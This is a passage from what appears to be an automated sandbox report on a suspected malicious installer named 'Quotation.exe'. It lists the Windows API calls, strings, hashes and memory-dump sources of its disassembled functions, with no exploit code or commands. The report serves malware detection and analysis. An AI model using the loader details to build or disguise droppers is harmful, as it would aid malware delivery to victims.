                                                              • lstrcatW.KERNEL32(?,Call), ref: 00404B04
                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B16
                                                                • Part of subcall function 00405B65: GetDlgItemTextW.USER32(?,?,00000400,00404B4D), ref: 00405B78
                                                                • Part of subcall function 004067CF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Quotation.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                                • Part of subcall function 004067CF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                                • Part of subcall function 004067CF: CharNextW.USER32(?,"C:\Users\user\Desktop\Quotation.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                                • Part of subcall function 004067CF: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                              • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,?,00420ED8,?,?,000003FB,?), ref: 00404BD9
                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BF4
                                                                • Part of subcall function 00404D4D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                                                • Part of subcall function 00404D4D: wsprintfW.USER32 ref: 00404DF7
                                                                • Part of subcall function 00404D4D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: A$C:\Users\user\ethnocentrism\skggene\Egyptians218$Call$X
                                                              • API String ID: 2624150263-3677112266
                                                              • Opcode ID: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
                                                              • Instruction ID: 030197d704291a410dcd06cfc4277a043b64cd4f667f0077e3e502e998d69d3f
                                                              • Opcode Fuzzy Hash: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
                                                              • Instruction Fuzzy Hash: CBA1A0B1900208ABDB11AFA5DD45AAF77B8EF84314F11803BF611B62D1D77C9A418B6D
                                                              Function 73421BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 734212BB: GlobalAlloc.KERNELBASE(00000040,?,734212DB,?,7342137F,00000019,734211CA,-000000A0), ref: 734212C5
                                                              • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 73421D2D
                                                              • lstrcpyW.KERNEL32(00000008,?), ref: 73421D75
                                                              • lstrcpyW.KERNEL32(00000808,?), ref: 73421D7F
                                                              • GlobalFree.KERNEL32(00000000), ref: 73421D92
                                                              • GlobalFree.KERNEL32(?), ref: 73421E74
                                                              • GlobalFree.KERNEL32(?), ref: 73421E79
                                                              • GlobalFree.KERNEL32(?), ref: 73421E7E
                                                              • GlobalFree.KERNEL32(00000000), ref: 73422068
                                                              • lstrcpyW.KERNEL32(?,?), ref: 73422222
                                                              • GetModuleHandleW.KERNEL32(00000008), ref: 734222A1
                                                              • LoadLibraryW.KERNEL32(00000008), ref: 734222B2
                                                              • GetProcAddress.KERNEL32(?,?), ref: 7342230C
                                                              • lstrlenW.KERNEL32(00000808), ref: 73422326
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2432204448.0000000073421000.00000020.00000001.01000000.00000005.sdmp, Offset: 73420000, based on PE: true
                                                              • Associated: 00000000.00000002.2432044113.0000000073420000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432399195.0000000073424000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432790406.0000000073426000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_73420000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                              • String ID:
                                                              • API String ID: 245916457-0
                                                              • Opcode ID: a09f010f5a2a9a1f76da1b5a7607ba97bb59c7b9b77a9e23400a6a1a1e45f710
                                                              • Instruction ID: 35066b612c064709b00b6817da954e4dc7b04c15b6680cf6846ec6786cbfcf3f
                                                              • Opcode Fuzzy Hash: a09f010f5a2a9a1f76da1b5a7607ba97bb59c7b9b77a9e23400a6a1a1e45f710
                                                              • Instruction Fuzzy Hash: 73227A71D1420ADFDB59CFA4C9807EEBFB5FB08316F14452ED166B2280D7749A82CB58
                                                              Function 00404F0D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404F25
                                                              • GetDlgItem.USER32(?,00000408), ref: 00404F30
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F7A
                                                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F91
                                                              • SetWindowLongW.USER32(?,000000FC,0040551A), ref: 00404FAA
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FBE
                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FD0
                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404FE6
                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FF2
                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405004
                                                              • DeleteObject.GDI32(00000000), ref: 00405007
                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405032
                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040503E
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D9
                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405109
                                                                • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,?,00404300), ref: 004044E3
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040511D
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0040514B
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405159
                                                              • ShowWindow.USER32(?,00000005), ref: 00405169
                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405264
                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C9
                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DE
                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405302
                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405322
                                                              • ImageList_Destroy.COMCTL32(?), ref: 00405337
                                                              • GlobalFree.KERNEL32(?), ref: 00405347
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053C0
                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00405469
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405478
                                                              • InvalidateRect.USER32(?,00000000,?), ref: 004054A3
                                                              • ShowWindow.USER32(?,00000000), ref: 004054F1
                                                              • GetDlgItem.USER32(?,000003FE), ref: 004054FC
                                                              • ShowWindow.USER32(00000000), ref: 00405503
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                              • String ID: $M$N
                                                              • API String ID: 2564846305-813528018
                                                              • Opcode ID: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
                                                              • Instruction ID: 467e9106b9ab4b1e9b2d04e68362d71007c986f05034cc4a0cb7dcf353c6e141
                                                              • Opcode Fuzzy Hash: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
                                                              • Instruction Fuzzy Hash: 16029B70A00609EFDB20DF95DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42CF58
                                                              Function 0040465F Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CheckDlgButton.USER32(?,-0000040A,?), ref: 004046FD
                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404711
                                                              • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040472E
                                                              • GetSysColor.USER32(?), ref: 0040473F
                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040474D
                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040475B
                                                              • lstrlenW.KERNEL32(?), ref: 00404760
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040476D
                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404782
                                                              • GetDlgItem.USER32(?,0000040A), ref: 004047DB
                                                              • SendMessageW.USER32(00000000), ref: 004047E2
                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040480D
                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404850
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 0040485E
                                                              • SetCursor.USER32(00000000), ref: 00404861
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040487A
                                                              • SetCursor.USER32(00000000), ref: 0040487D
                                                              • SendMessageW.USER32(00000111,?,00000000), ref: 004048AC
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                              • String ID: Call$N$X
                                                              • API String ID: 3103080414-3886858328
                                                              • Opcode ID: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
                                                              • Instruction ID: fa786ba7610ecb1ae21ae2169d8ef808fc0b2da043ab7544d4c43deaa2774949
                                                              • Opcode Fuzzy Hash: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
                                                              • Instruction Fuzzy Hash: 7F61B3B1A00209BFDB10AF64DD85A6A7B79FB84354F00843AFB05B61D0D7B9AD61CF58
                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                              • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                              • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                              • String ID: F
                                                              • API String ID: 941294808-1304234792
                                                              • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                              • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                                              • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                              • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                                              Function 00406167 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406302,?,?), ref: 004061A2
                                                              • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061AB
                                                                • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                                • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                              • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061C8
                                                              • wsprintfA.USER32 ref: 004061E6
                                                              • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406221
                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406230
                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406268
                                                              • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062BE
                                                              • GlobalFree.KERNEL32(00000000), ref: 004062CF
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062D6
                                                                • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00406015
                                                                • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406037
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                              • String ID: %ls=%ls$[Rename]
                                                              • API String ID: 2171350718-461813615
                                                              • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                              • Instruction ID: d8f03b5b48010a369f687ed07a259b5d04d98e8e290d987932ab0f9f84d7b5e4
                                                              • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                              • Instruction Fuzzy Hash: 89313230201325BFD6207B659D48F2B3A6CDF41714F12007EBA02F62C2EA7D98218ABD
                                                              Function 004067CF Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Quotation.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                              • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                              • CharNextW.USER32(?,"C:\Users\user\Desktop\Quotation.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                              • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                              Strings
                                                              • "C:\Users\user\Desktop\Quotation.exe", xrefs: 00406813
                                                              • *?|<>/":, xrefs: 00406821
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004067D0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Char$Next$Prev
                                                              • String ID: "C:\Users\user\Desktop\Quotation.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 589700163-3250725203
                                                              • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                              • Instruction ID: 2d41fa7b6770246c30beeceb47eb68b435a53440eacd13368e2f30b8c56315d6
                                                              • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                              • Instruction Fuzzy Hash: A511935680121296DB303B14CC44ABB66E8AF54794F52C03FE999732C1E77C5C9296BD
                                                              Function 00404507 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00404524
                                                              • GetSysColor.USER32(00000000), ref: 00404562
                                                              • SetTextColor.GDI32(?,00000000), ref: 0040456E
                                                              • SetBkMode.GDI32(?,?), ref: 0040457A
                                                              • GetSysColor.USER32(?), ref: 0040458D
                                                              • SetBkColor.GDI32(?,?), ref: 0040459D
                                                              • DeleteObject.GDI32(?), ref: 004045B7
                                                              • CreateBrushIndirect.GDI32(?), ref: 004045C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                              • String ID:
                                                              • API String ID: 2320649405-0
                                                              • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                              • Instruction ID: 524417ed32742d4b72cd17798d780815826fd18a7bcb7bb0f1ed1fdd1052d135
                                                              • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                              • Instruction Fuzzy Hash: B22135B1500705AFCB319F78DD08B577BF5AF81714B048A2DEA96A26E0D738D944CB54
                                                              Function 00404E5B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E76
                                                              • GetMessagePos.USER32 ref: 00404E7E
                                                              • ScreenToClient.USER32(?,?), ref: 00404E98
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EAA
                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ED0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$ClientScreen
                                                              • String ID: f
                                                              • API String ID: 41195575-1993550816
                                                              • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                              • Instruction ID: cfceae8db68972c520d490933057d7cb8d8acba3ea2256e028311c612775fba1
                                                              • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                              • Instruction Fuzzy Hash: A3015E7190021CBADB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A418BA4
                                                              Function 00401E53 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(?), ref: 00401E56
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                              • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                              • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED8
                                                              Strings
                                                              Memory Dump Source
